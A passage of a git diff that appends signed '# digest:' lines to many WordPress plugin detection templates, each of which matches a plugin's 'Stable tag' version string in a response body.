\ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..d3eed126e0 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204744588930018506172c8ffd59248850ab478ee2207ee1233ff3a358dd80c3ed022100b0f1a9b1b57dc65b064c36829bb6d122ae6458943358048c664e5117a1bd8261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..072ace5a52 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a1c0d0712239b82a59721a43af1a680dca433ffef2528f201fbc4c04dfcda35c022100c5a2d4f5d5b5f0b854c0d1cfefcf842fb2e59117f10bc483d34aec4c801bde8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..06630cf2c6 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204eff4e4f2fc0219f167bbc43215addde9f6fd99ef285c153034104e3ef8b1b0702206cff0ebab9d8f79f40551549032d0bd5d62c41ec85397d9168e97600644135c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..6e25646bf9 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009bd3a23ef2e9ff87b5993df8a89d21aa14b391d31d8cc3736c14067c7fe1ce8a02202abef744599ad73e7c12628ff801392477eb6d5c2f231092527c71e4050261f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..38c5ba0e87 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100912b910bd2c879a6fa4309934a5c5122e2469721ee54827843425926fbf644a2022100eebc0e32a20b8818d965fbf00e9132ccad7a517c1da2d2fd2a1338c2830097c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..2e47a8ec5f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220106100c246ff17f932ebbdb84c2aef39e6cfee981910a619fc95737447cf63bd022100c9a6a537d8228df7de1d1af980ad2dae6ec04265cff77b241b3a44c9ae6faa0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..32b3b18110 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c165fefad5efa423fa29cd598b548bff020f4428e035823148ac65c6b0b751cc022058fe7af98c6344ac957598dddb624f5c71d54bffcbd0aa8a9ed9eb151d4ff9ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..816b50845d 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207a743ea2789ff14c0a79d09245ec654f7f983c4f31c91bda13e0615efc4cacc1022100f5c21e3e1ae14bcf7a88e3c6d883d0f7a2cc061a88b4ee2c5b04c4fbc7af8132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..0b43f1bc78 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e25e27e87d3a83148d4f8e30a6ab1d728dc92326e7abafd15264740483b8d496022047e27e96b03eb8ee98cb0b5f4155c0c378e00db459ed4f1a69ed92b59f632d48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..9d37ce6b1b 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220771206210070aacb3598d827c91d0fea9e6dff0666b79c898496e34e0182f97502201d32b5fb1e6a0dbb36acd5da85f9e286efa3238d593da8033f0a0dd35c91c4bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..a90d02b82e 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008c03b635d7c993204117dc7c873a0ae0c0686334bc81ba4502d129961748330b022100966b9c4d50b960959e8b3d7cefcebdd2f1b1803283401ec5e2506ef6d3b8a580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..cd3ecfbeff 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210089c4e7632ecdad7f4d092b72af79dbad16627c6ff917c022b207e2634f38b333022100d3853b4ea3cafc1bf591dd6b7d70374aee07c574dd96d8ab1ab32d16d275da26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..9a5a9d981c 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204b889ac74e8e9234b313df24f87a1230265fa8d546f801479b9b919b1b935d05022100bc679bbd0ad683b47b5e29a711b904a5208f7aa356e5df4a1f5bdcb811773a15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..6cb7b6e857 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022073947215a9181dede0627a6816069d7bfe83a70c816a567a17a4e68c9167a07202207336bf51f550d724c301d0745aab94d8ef3dd9f56ab97c689b7caf785d51f391:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..e49bea1ab9 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b6d329042151f56a92a09ca9f0fa32c3326cf18bdccb6f7ddb3d13ce56e6bee022008262053d04ba6a7dc0e545e39ef5d58a3a998daaa709b08887514b2fde9b447:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..897938757c 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204218286f0a25d396c91a17d481adcf8b6aaa9922beba5caf30850b1b41c70f6f02210084dbc6f8218f71e1f763cf13cc9469be6d2e4f61aef6a9144de6061668f799c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..962ee19127 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f5fbccafa1f21f0d7f9ae0d1b7b6cadebf0e8b52c3eece1975244f3e20c9b66022100fa0f1e3ad629afd316ee8dd5d032c1ec1ac505a7d1310d37de4b65e02fa6282b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..869f84600c 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e7b743da77ebb8b5a13d4af133710f885409ae9f75aa7858b4a8ebfd02901cb2022100ebebb7358f4c1460504aa2b83355e2fdb79347a9a0eddf6c7b8a709c81a20f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..aa203efaef 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022079c2ffae21ea179ea5d8488b3c3800f8ee30deeee0126793463dccf379bc738802210081952f991d2ffc45a065f8c1df0c5f111fd7df3e67bedee25c2fa2e25534793f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..98dcef9a84 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022023ed1711d358dd4fdc649093253abc9ca46df5244bb7d696f04e0b3646d93fde02200d91dea11d977f6ffc5d49f1fa992354c1e15caf235a5031c1e0636d6b9f419b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..670574f365 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bcec64eed2022d5e6f987f2a4c781f7238d2b5c69cd080d2905aaa2fc322a50d0220475c1d6b13fdca4443ca4e205f4cddea66f8ff444318b8e122c43dac74db8999:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..8e10d000b3 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210099705b5e89887ef187d814b519687cc1e314048b70f3009f3898d4a7811090c2022054db2cce679d6093f237920192334c46a15a769d6c1026bab4bfef282bcc056d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..e6b2b44774 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022033c6f16011950f1f4e17b64f94a0fa8a8d1f478e241629a4c813f179f4cba76c022064a7135a02c34fdaf033a89337b40944ce60a0327b32d32813efa27e8f2a06ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..bab9b6bafb 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009a27c8500735020a4c23726faa7af384bee4e95abd99816f873b84dd610d82f2022008960c8598fff08b620ef8c4b3f46f8d27c79152f2f38e25673c91b8fdbcb2e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..250acb9f75 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100beff0b48ce9fd1295bac4213935b69af24c1ed782aa567070774587f9b9a28cb022100d8a72c493042b9885cbead9e4ddfc45b155b076ddaa936ea8b109db46d693d66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..8d8592bbcf 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022015ffb61f5986f789dfb378eb6edd7c8318090118af17905aff977c4cc339e0a9022021708ce4edb9f4f7eee44ff39e34b023df13b75407beb30983e7ba10fc10b795:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..68eb2049c3 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b819282a70e2d618caede443a5873931241f88dc7df5a51843ec06895f4097f4022044a661096d6241b80a4b0ceb11a883982e6275b532b62e7204741ec41d0b86f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..910afed11a 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201834c3fcba0112176d13c3a0933524d62959fa1ac7fd720c997aa7b179cdce4a02205266d5aa97814c785f49331b702e11041bd4d4e5d763b8b4be78154b994b3377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..8a4554b10d 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202b49bb03379c2eecee1aec53e4119a9993616290241e50d78e4ed90c2b2b0d4f022100a159068cc56cbe04c388d12fb22c2477cf7860186a49f36a323e18c53c8e4588:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..e0559dd1bd 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203af97d34da63c2e3840447d983bfc36ec46a3d3c919d3e4eee1089dc6da475bb0220392e0597b347b2c9d474aa5226b8d2e3e2354f16f118377286e95f3ef134019e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..2ec6243f2d 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204ad8f355657fbcd18ef670fcd044c636e3a485c12b72ef4f55dc002c0d349e4b02204a20f5fb777dddd3c8fe0c59034584c9d72bf53b4fc2b4430bbee1bd4d849a22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..63d2ceb140 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022029572a4cd80a1ae1f3c3576c16f54257b2668ad21811b81b277f3e37f57dd5ac02204840f0078db5edddb0a7eda33af32a5a6ef25fb4e65d8a7d3218c841d44ef695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..669d663e1f 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220592736234fa04453f9ac49c44b4a0c3a41c2f93f03dab6860cdedb99a0760b0c022100f947d7ddd690a9c3272741f5b7373a161371f2aaeb753b134b1878a0b46c6b38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..22acd0f164 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd04ba5e425e3dd6b5f92ebda6dea747deedafeead8d15f3402451fa8b757c6f02206de44240cb1399f1a0edee81b416f320288c1d0d9599ef690e905c39a87ed48b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..403182c7c6 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220608e417bbe57bb89132b934fc8d7771b2f1e3f46f3fa96a8962308c4e009556f022100c8e972ce4a8ac57d9425d0edc39a7e9b447a543c43ed3771321c0fc31b465048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..e4d37466b2 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dd3dc7e60841835abdffabfdc222b725d186872db93d7ab9c3e9db93773a4d26022100b473c9921a82468e5da144a36f8adcee74aa80493f1168bbd25b588c85b6efcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..bdd22e5868 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205f342f648b4c84f694571efa53242bd437d3185793bd65964d0163d9acd598f7022012bbcbadd2f0fc34b41d630461affeae7b8f40c64ac91cc429145851ecf24378:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..adea4c86a5 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206659ec6536d3fb6643281680b747bca6a5ef5fd03e9c59c62f7869e0e32aac9c02206733d91f1908a3c9c60c80ff9007ff3d055ba937b32e35002fd4e2c2c368db6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..2d4b1ec25a 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a3cc3c0dee59d0554feb2df8553927f0ccc58d5c1407aef6cdf29a812bd7526302207f7ea3b522b2db2df95c43292e613f06d1c2ed60a7b766d46b32c1cd415f3043:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..24613ab6a8 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e0f7c08c25f00d0da79e410cb67dc4824bd025b7f00cd842e679a1635bfff844022100d6365b48d485aac77bba7ab1c149a0d39bdcef43ff74e2d599770c7f5407b711:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..2d87605af1 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d57bdb9964f4c33fbad14dfceec3ee3ad3835d28d1b4108a107fef4715a548e5022100db960644f5693a981e5d8b76cc617baed3ac1868dd9c2fb1e28f7452a7e61844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..3661f78c8c 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203c8f08d7cf58eee422f688091c28fe3ecd35d782495f775b31baaa1f8f400f670220369ce822d854b1eaacc54c7d03db307c006bb33212780489275885e17bb4b841:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..1ce0e38df2 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206e71ddf62210dd8b387705459c78afabaacd681f86cc06ac37d6155645c1c09e02204417df6361a659efba52f2879b18c85dacf9b46ddea50b5b707e9e282ccdaf71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..0462cc0edd 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022051f69d6ba11ea4eb7e51eff77e1f0e614427ad60e5ce8625db5b833a2bde7d4f022100bacb2ba6189f9afc2b3d3bd5612382514f4188f1c6eb59bd8d90b0434101a688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..b926f83547 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aa37209dfb26f3b385f7f3dabb2b7d1eaab88001dc2ed71b5a2e04745c0efd870221009d7c48a24525a29393b23731cea72b49493c4fed95203670b98fe32647ed1a96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..22840625cc 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200ac40c966b6505666d0dcd3989028be6e5acc61b2ddfffa513c348b95f31476f022018cb8b57c15660390d78a14dbb94688b27ef504cdac59510de6b7686225294fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..b967aa79de 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 